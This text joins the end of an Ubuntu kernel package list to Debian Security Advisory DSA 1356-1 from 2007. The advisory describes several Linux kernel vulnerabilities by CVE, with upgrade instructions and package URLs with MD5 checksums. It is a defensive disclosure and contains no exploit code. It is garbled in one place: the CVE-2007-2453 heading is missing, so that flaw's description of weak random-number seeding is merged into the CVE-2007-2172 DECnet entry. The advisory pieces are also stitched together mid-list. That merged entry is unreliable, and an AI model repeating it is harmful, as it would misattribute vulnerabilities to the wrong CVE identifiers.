d18af721cafb8bec7d1e17297dfbcc32\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb\n      Size/MD5:   142706 09e2dfa857a349061e96f467e9c825b1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb\n      Size/MD5:    51444 db22c9845a481ca60d58a1f844695163\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb\n      Size/MD5:    37408 eaedbf00ede88a54db7b13762fdcb716\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb\n      Size/MD5:   151156 6ee9c9decad54a21140c90893d10b0aa\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb\n      Size/MD5:  1930634 333430bccad9de0487af5a050173091b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-sparc64-smp_2.6.20-16.31_sparc.deb\n      Size/MD5:   779738 031e5d9af9445b517c49c8aefcb4dd40\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-sparc64_2.6.20-16.31_sparc.deb\n      Size/MD5:   778590 07b6ba1bb24fc1907b991575b8705807\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16_2.6.20-16.31_sparc.deb\n      Size/MD5:  8120610 4418251e39b254cf57130e35220621fa\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-sparc64-smp_2.6.20-16.31_sparc.deb\n      Size/MD5: 16955024 69bcc60276b1759bde1206dd2e46584f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-sparc64_2.6.20-16.31_sparc.deb\n      Size/MD5: 16590864 08de9c062a191c372b33bf7449e476b3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-sparc64-smp_2.6.20-16.31_sparc.deb\n      Size/MD5:  2262940 07bccad347f0390fb8c1b498b4a668d1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-sparc64_2.6.20-16.31_sparc.deb\n      Size/MD5:  2176860 3c6adeb479419b6d42ea864eba0f1be1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-libc-dev_2.6.20-16.31_sparc.deb\n      Size/MD5:   699174 74d4da9c93b515d1dc80cd6f5c8a6d86\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb\n      Size/MD5:   264332 b3cb71049afbeaf81b0ca1fa1d5e95d8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb\n      Size/MD5:   156572 cd9bdd297c18316905ea3f660a2be324\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb\n      Size/MD5:   241028 5deb47cc86fdff7ccaf49d50ac4476f0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb\n      Size/MD5:  1110524 7b330f95a1cacc790372ef810bc9cda7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb\n      Size/MD5:  1571854 7fe9b3ea1766e53415deec6a78c31a89\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb\n      Size/MD5:   180384 8e8cae9b9c2217cc6fa610160b48ea21\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb\n      Size/MD5:   310086 9c3269d5982382258ef0f7938ec42116\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb\n      Size/MD5:    39662 453530c683eef14de2c8c5ff111fce82\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb\n      Size/MD5:    37984 4e923ff0f29bb521fa542cbf523fb7b1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb\n      Size/MD5:     8644 d925f83bd72ace70986656ac077efb0b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb\n      Size/MD5:    59410 a49e42d1e09c5e734167c09e450ea47b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb\n      Size/MD5:    90820 e0ba3e1bb84fd22cfb6deb879eca9634\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb\n      Size/MD5:   322566 c64db3fb65e3fccb40d454c3fff95cc3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb\n      Size/MD5:   882382 5edd846df467cdd53baac8b54f4d1721\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb\n      Size/MD5:     9828 0d7aac7d3076eed86a509c66a48c8e0e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb\n      Size/MD5:   290224 eb743d1afdad54d227eddd91e867e7ef\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-16-sparc64-di_2.6.20-16.31_sparc.udeb\n      Size/MD5:    54798 0dd2e0292ae67485c182631388920467\n\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n- --------------------------------------------------------------------------\nDebian Security Advisory DSA 1356-1                    security@debian.org\nhttp://www.debian.org/security/                               Dann Frazier\nAugust 15th, 2007                       http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage        : linux-2.6\nVulnerability  : several\nProblem-Type   : local/remote\nDebian-specific: no\nCVE ID         : CVE-2007-1353 CVE-2007-2172 CVE-2007-2453 CVE-2007-2525\n                 CVE-2007-2876 CVE-2007-3513 CVE-2007-3642 CVE-2007-3848\n                 CVE-2007-3851\n                 \nSeveral local and remote vulnerabilities have been discovered in the Linux\nkernel that may lead to a denial of service or the execution of arbitrary\ncode. The Common Vulnerabilities and Exposures project identifies the\nfollowing problems:\n\nCVE-2007-1353\n\n    Ilja van Sprundel discovered that kernel memory could be leaked via the\n    Bluetooth setsockopt call due to an uninitialized stack buffer. \n\nCVE-2007-2172\n\n    Thomas Graf reported a typo in the DECnet protocol handler that could\n    be used by a local attacker to overrun an array via crafted packets,\n    potentially resulting in a Denial of Service (system crash). \n    A similar issue exists in the IPV4 protocol handler and will be fixed\n    in a subsequent update. \n    Slightly less random numbers resulted from hashing a subset of the\n    available entropy. zero-entropy systems were seeded with the same\n    inputs at boot time, resulting in repeatable series of random numbers. \n\nCVE-2007-2525\n\n    Florian Zumbiehl discovered a memory leak in the PPPOE subsystem caused\n    by releasing a socket before PPPIOCGCHAN is called upon it. This could\n    be used by a local user to DoS a system by consuming all available memory. \n\nCVE-2007-2876\n\n    Vilmos Nebehaj discovered a NULL pointer dereference condition in the\n    netfilter subsystem. This allows remote systems which communicate using\n    the SCTP protocol to crash a system by creating a connection with an\n    unknown chunk type. \n\nCVE-2007-3513\n\n    Oliver Neukum reported an issue in the usblcd driver which, by not\n    limiting the size of write buffers, permits local users with write access\n    to trigger a DoS by consuming all available memory. \n\nCVE-2007-3642\n\n    Zhongling Wen reported an issue in nf_conntrack_h323 where the lack of\n    range checking may lead to NULL pointer dereferences. Remote attackers\n    could exploit this to create a DoS condition (system crash). \n\nCVE-2007-3848\n\n    Wojciech Purczynski discovered that pdeath_signal was not being reset\n    properly under certain conditions which may allow local users to gain\n    privileges by sending arbitrary signals to suid binaries. \n\nCVE-2007-3851\n                 \n    Dave Airlie reported that Intel 965 and above chipsets have relocated\n    their batch buffer security bits. Local X server users may exploit this\n    to write user data to arbitrary physical memory addresses. \n\nThese problems have been fixed in the stable distribution in version \n2.6.18.dfsg.1-13etch1. \n\nThe following matrix lists additional packages that were rebuilt for\ncompatibility with or to take advantage of this update:\n\n                                 Debian 4.0 (etch)\n     fai-kernels                 1.17+etch4\n     user-mode-linux             2.6.18-1um-2etch3\n\nWe recommend that you upgrade your kernel package immediately and reboot\nthe machine. If you have built a custom kernel from the kernel source\npackage, you will need to rebuild to take advantage of these fixes. \n\nUpgrade Instructions\n- --------------------\n\nwget url\n        will fetch the file for you\ndpkg -i file.deb\n        will install the referenced file. \n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n        will update the internal database\napt-get upgrade\n        will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration. \n\n\nDebian GNU/Linux 4.0 alias etch\n- --------------------------------\n\n  Source archives:\n\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.18.dfsg.1-13etch1.dsc\n      Size/MD5 checksum:     5672 ef2648e54c6ea1769b29ba191fc13083\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.18.dfsg.1-13etch1.diff.gz\n      Size/MD5 checksum:  5306139 589297d453d15848b5879cf22eed7d40\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.18.dfsg.1.orig.tar.gz\n      Size/MD5 checksum: 52225460 6a1ab0948d6b5b453ea0fce0fcc29060\n\n  Architecture independent components:\n\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-doc-2.6.18_2.6.18.dfsg.1-13etch1_all.deb\n      Size/MD5 checksum:  3585938 a94cd1247d3dc98378dd094b3b364044\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-manual-2.6.18_2.6.18.dfsg.1-13etch1_all.deb\n      Size/MD5 checksum:  1081908 36d119bd92dbd35a8f83b191f74daf09\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-patch-debian-2.6.18_2.6.18.dfsg.1-13etch1_all.deb\n      Size/MD5 checksum:  1475708 0373ab2ac016f31d2591eab4de39e4d3\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-source-2.6.18_2.6.18.dfsg.1-13etch1_all.deb\n      Size/MD5 checksum: 41417232 279c0d7b44a451169a118e0a2b0c4eeb\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-support-2.6.18-5_2.6.18.dfsg.1-13etch1_all.deb\n      Size/MD5 checksum:  3738202 e4cfce3e67d3a0f6aeb4fe1fb5706372\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-tree-2.6.18_2.6.18.dfsg.1-13etch1_all.deb\n      Size/MD5 checksum:    51094 b22167a8b2ab8d0cfb9eded0d0b8d8a0\n\n  Alpha architecture:\n\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5_2.6.18.dfsg.1-13etch1_alpha.deb\n      Size/MD5 checksum:  3024210 ad1fc21ac8fcb76a0db86d25737c8a83\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all_2.6.18.dfsg.1-13etch1_alpha.deb\n      Size/MD5 checksum:    50680 28ad3748b8d76abbb2e896f7ff190240\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all-alpha_2.6.18.dfsg.1-13etch1_alpha.deb\n      Size/MD5 checksum:    50720 1f106b97c91e07921402b0a2174574c6\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-alpha-generic_2.6.18.dfsg.1-13etch1_alpha.deb\n      Size/MD5 checksum:   263524 4ce1e83ad733aee9d36b075babc6f908\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-alpha-legacy_2.6.18.dfsg.1-13etch1_alpha.deb\n      Size/MD5 checksum:   263838 4c9ebe648f73818252ed3de79567219e\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-alpha-smp_2.6.18.dfsg.1-13etch1_alpha.deb\n      Size/MD5 checksum:   262864 a3d6389b9224fcef726128f3a747a4f8\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver_2.6.18.dfsg.1-13etch1_alpha.deb\n      Size/MD5 checksum:  3048212 d86c3c8fac6533904b91592016e2afba\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver-alpha_2.6.18.dfsg.1-13etch1_alpha.deb\n      Size/MD5 checksum:   264300 15606dadab1e1bbb4d9234a8bfb09b5e\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-alpha-generic_2.6.18.dfsg.1-13etch1_alpha.deb\n      Size/MD5 checksum: 23485186 1978fddd39e8e7ce9ebc88efefd4ebe0\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-alpha-legacy_2.6.18.dfsg.1-13etch1_alpha.deb\n      Size/MD5 checksum: 23464818 bdfd39761fd0bc68de001efb430895af\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-alpha-smp_2.6.18.dfsg.1-13etch1_alpha.deb\n      Size/MD5 checksum: 23838852 e9ae2b4f056d9b47832234d2aa6ec4d7\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-vserver-alpha_2.6.18.dfsg.1-13etch1_alpha.deb\n      Size/MD5 checksum: 23528772 4f029181ad02c46f2ae2b34038b629e0\n\n  AMD64 architecture:\n\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5_2.6.18.dfsg.1-13etch1_amd64.deb\n      Size/MD5 checksum:  3164562 5bef24546e02e53d0b866b68e57c8294\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all_2.6.18.dfsg.1-13etch1_amd64.deb\n      Size/MD5 checksum:    50644 173c9d06298afe48e609cd08a5420737\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all-amd64_2.6.18.dfsg.1-13etch1_amd64.deb\n      Size/MD5 checksum:    50668 61e625ce94855d474c0562819ae3b879\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-amd64_2.6.18.dfsg.1-13etch1_amd64.deb\n      Size/MD5 checksum:   270036 cd6f518453e0b75e3d4e17bc1fca62a3\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver_2.6.18.dfsg.1-13etch1_amd64.deb\n      Size/MD5 checksum:  3187796 2958630378a24cb3f16807e04fe17297\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver-amd64_2.6.18.dfsg.1-13etch1_amd64.deb\n      Size/MD5 checksum:   269650 dbfd4c56547401e7b6a6460f41dd266b\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-xen_2.6.18.dfsg.1-13etch1_amd64.deb\n      Size/MD5 checksum:  3330944 996a5cba350ae0c9110f8ca72492bfc2\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-xen-amd64_2.6.18.dfsg.1-13etch1_amd64.deb\n      Size/MD5 checksum:   271784 c1841e07342a73c9cf87058cc0ca943b\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-xen-vserver_2.6.18.dfsg.1-13etch1_amd64.deb\n      Size/MD5 checksum:  3353796 730dd7dd17cb532152463000f16459f0\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-xen-vserver-amd64_2.6.18.dfsg.1-13etch1_amd64.deb\n      Size/MD5 checksum:   270068 363ff82948e473032eaa4fc37d2b9d6b\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-vserver-amd64_2.6.18.dfsg.1-13etch1_amd64.deb\n      Size/MD5 checksum: 16838550 dee2a96f0c89bc9b59b2febd42dc8bb1\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-xen-amd64_2.6.18.dfsg.1-13etch1_amd64.deb\n      Size/MD5 checksum:  1647400 8f72b372c132b40f5c828d7d0a94bf62\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-xen-vserver-amd64_2.6.18.dfsg.1-13etch1_amd64.deb\n      Size/MD5 checksum:  1679728 853224dc22a8fa38c8b4af6534886a77\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-5-xen-amd64_2.6.18.dfsg.1-13etch1_amd64.deb\n      Size/MD5 checksum: 15238676 d62ddc5e61a35e84529262c9101b0e93\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-5-xen-vserver-amd64_2.6.18.dfsg.1-13etch1_amd64.deb\n      Size/MD5 checksum: 15256142 8b0667dd7cb043b753ce3a9770058515\n    http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-5-xen-amd64_2.6.18.dfsg.1-13etch1_amd64.deb\n      Size/MD5 checksum:    50618 0da191c5dcd2406d079f9aab3b4ca0a3\n    http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-5-xen-vserver-amd64_2.6.18.dfsg.1-13etch1_amd64.deb\n      Size/MD5 checksum:    50632 46cd39c06556d9bc465099cddb3c7f3d\n\n  ARM architecture:\n\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5_2.6.18.dfsg.1-13etch1_arm.deb\n      Size/MD5 checksum:  3346806 bc6581484d2364ccba4bbdb275072ecb\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all_2.6.18.dfsg.1-13etch1_arm.deb\n      Size/MD5 checksum:    50652 976339e33b567d816811d561dc575cc8\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all-arm_2.6.18.dfsg.1-13etch1_arm.deb\n      Size/MD5 checksum:    50694 19473ef72c0109f1ce9dc9dfd4f3de3d\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-footbridge_2.6.18.dfsg.1-13etch1_arm.deb\n      Size/MD5 checksum:   225038 969f487c6c9d50fef7200e0a3ecb5c4b\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-iop32x_2.6.18.dfsg.1-13etch1_arm.deb\n      Size/MD5 checksum:   226564 c5f03ec763dfb6b27d00f8f90e0ae9da\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-ixp4xx_2.6.18.dfsg.1-13etch1_arm.deb\n      Size/MD5 checksum:   232748 bb9606e416b2aa84c3cc8071ac2350d8\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-rpc_2.6.18.dfsg.1-13etch1_arm.deb\n      Size/MD5 checksum:   192126 cd01397be860265e013d55aa574c7347\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-s3c2410_2.6.18.dfsg.1-13etch1_arm.deb\n      Size/MD5 checksum:   194764 e05a0715a2bf9cbac171217b22314b19\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-footbridge_2.6.18.dfsg.1-13etch1_arm.deb\n      Size/MD5 checksum:  7518754 018e9a847ff04f7fc3580f85bfc2abe1\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-iop32x_2.6.18.dfsg.1-13etch1_arm.deb\n      Size/MD5 checksum:  7869416 e4750e15d602443f08ba02c7e7c2a137\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-ixp4xx_2.6.18.dfsg.1-13etch1_arm.deb\n      Size/MD5 checksum:  8806748 7436ed2118660e9c7f4f4697ac5868c3\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-rpc_2.6.18.dfsg.1-13etch1_arm.deb\n      Size/MD5 checksum:  4558510 68d071f5a09c182509bea873aef02105\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-s3c2410_2.6.18.dfsg.1-13etch1_arm.deb\n      Size/MD5 checksum:  4981066 6c261104c98cc528d6633f79274ad72a\n\n  HP Precision architecture:\n\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5_2.6.18.dfsg.1-13etch1_hppa.deb\n      Size/MD5 checksum:  2964238 f6fd8c5dd6071370f953e496756851cf\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all_2.6.18.dfsg.1-13etch1_hppa.deb\n      Size/MD5 checksum:    50642 8aca6d6bffa3b334b71b66332dd125ae\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all-hppa_2.6.18.dfsg.1-13etch1_hppa.deb\n      Size/MD5 checksum:    50668 7dfc3cbdd0f0763008e0246015fe5c9f\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-parisc_2.6.18.dfsg.1-13etch1_hppa.deb\n      Size/MD5 checksum:   188488 31502e1f9bdcc0a24d6a7762f6f4cbe8\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-parisc-smp_2.6.18.dfsg.1-13etch1_hppa.deb\n      Size/MD5 checksum:   189420 e6deaa2c4a398b59a40a732cb9018940\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-parisc64_2.6.18.dfsg.1-13etch1_hppa.deb\n      Size/MD5 checksum:   189146 133d151b9aa064b61c90c0c9ce20656c\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-parisc64-smp_2.6.18.dfsg.1-13etch1_hppa.deb\n      Size/MD5 checksum:   189834 c7ada740b1647894ceda503d4ee8399b\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-parisc_2.6.18.dfsg.1-13etch1_hppa.deb\n      Size/MD5 checksum: 10498710 5d3ee84cc71a57eabe1d0647f704ad3c\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-parisc-smp_2.6.18.dfsg.1-13etch1_hppa.deb\n      Size/MD5 checksum: 10940810 8e1de20ffcc7df26862544af83f78771\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-parisc64_2.6.18.dfsg.1-13etch1_hppa.deb\n      Size/MD5 checksum: 11344516 a6fe777a6d6296c1d95c81c25931102e\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-parisc64-smp_2.6.18.dfsg.1-13etch1_hppa.deb\n      Size/MD5 checksum: 11751450 e0c73577059ad7ee24893278e8bb580c\n\n  Intel IA-32 architecture:\n\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5_2.6.18.dfsg.1-13etch1_i386.deb\n      Size/MD5 checksum:  3164474 5581e6b60de382087f4e3cd05a326cd8\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-486_2.6.18.dfsg.1-13etch1_i386.deb\n      Size/MD5 checksum:   277248 ff8b78d10cb79fc1c9258cd43a408499\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-686_2.6.18.dfsg.1-13etch1_i386.deb\n      Size/MD5 checksum:   275932 874d04ecd1f692d9781e2cb47c687ee6\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-686-bigmem_2.6.18.dfsg.1-13etch1_i386.deb\n      Size/MD5 checksum:   276286 dbcc90161edc6a46b7a89a10b0fc22ff\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all_2.6.18.dfsg.1-13etch1_i386.deb\n      Size/MD5 checksum:    50640 34b3065eb0fdc3a02576c9ebdd2508d9\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all-i386_2.6.18.dfsg.1-13etch1_i386.deb\n      Size/MD5 checksum:    50700 77d1ae15ad63b7e9675225a6ca7db47c\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-amd64_2.6.18.dfsg.1-13etch1_i386.deb\n      Size/MD5 checksum:   268294 a60191beaaf0d62099dbd1a20eaf6b75\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-k7_2.6.18.dfsg.1-13etch1_i386.deb\n      Size/MD5 checksum:   275830 f9a83308d8ecd6eb36d6791b864116c5\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver_2.6.18.dfsg.1-13etch1_i386.deb\n      Size/MD5 checksum:  3050892 8283afde8651de38ff35c68ac9d34feb\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver-686_2.6.18.dfsg.1-13etch1_i386.deb\n      Size/MD5 checksum:   273688 759941012b1848db94e34d6f1c57cfd6\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver-k7_2.6.18.dfsg.1-13etch1_i386.deb\n      Size/MD5 checksum:   273764 bc27c920b5a85c643d3f9a7fa3bb2f9f\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-xen_2.6.18.dfsg.1-13etch1_i386.deb\n      Size/MD5 checksum:  3145220 f0cee6bc58f389ef78fc3cbcad757197\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-xen-686_2.6.18.dfsg.1-13etch1_i386.deb\n      Size/MD5 checksum:   270550 b1aca209d3f63334b8512bd70e7fee04\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-xen-vserver_2.6.18.dfsg.1-13etch1_i386.deb\n      Size/MD5 checksum:  3167356 72a44aac33deb66d1eed41b37d9f6f84\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-xen-vserver-686_2.6.18.dfsg.1-13etch1_i386.deb\n      Size/MD5 checksum:   271130 cebd78501825a595f992a575371cd8b7\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-486_2.6.18.dfsg.1-13etch1_i386.deb\n      Size/MD5 checksum: 16170152 7dbf8514bc38e86a6d6454593628a9a8\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-686_2.6.18.dfsg.1-13etch1_i386.deb\n      Size/MD5 checksum: 16319248 a099f9f04a33385dc29a7cc5ed743411\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-686-bigmem_2.6.18.dfsg.1-13etch1_i386.deb\n      Size/MD5 checksum: 16384438 83d05912745de976a2648295241f0b15\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-amd64_2.6.18.dfsg.1-13etch1_i386.deb\n      Size/MD5 checksum: 16816198 1c14cd0e4867b12f05bea602a7940b11\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-k7_2.6.18.dfsg.1-13etch1_i386.deb\n      Size/MD5 checksum: 16449650 9c195ec1b9f2b5f2531017389234d817\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-vserver-686_2.6.18.dfsg.1-13etch1_i386.deb\n      Size/MD5 checksum: 16358054 727d0f2e6e821a34c527c44946660653\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-vserver-k7_2.6.18.dfsg.1-13etch1_i386.deb\n      Size/MD5 checksum: 16488812 1619800305c3c55e48f9b5484cd7ec39\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-xen-686_2.6.18.dfsg.1-13etch1_i386.deb\n      Size/MD5 checksum:  1296346 6f233c2b69738b9d577a4c1d7d9283a3\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-xen-vserver-686_2.6.18.dfsg.1-13etch1_i386.deb\n      Size/MD5 checksum:  1323270 c3ba3e1299340fe9666746ada15cafe2\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-5-xen-686_2.6.18.dfsg.1-13etch1_i386.deb\n      Size/MD5 checksum: 14258314 37215c1b602209320153136ddae5b53d\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-5-xen-vserver-686_2.6.18.dfsg.1-13etch1_i386.deb\n      Size/MD5 checksum: 14272088 00cfea4d19109eff959c360f63b90c18\n    http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-5-xen-686_2.6.18.dfsg.1-13etch1_i386.deb\n      Size/MD5 checksum:    50620 3d60ebbd894ac77ddaafaaba903083b8\n    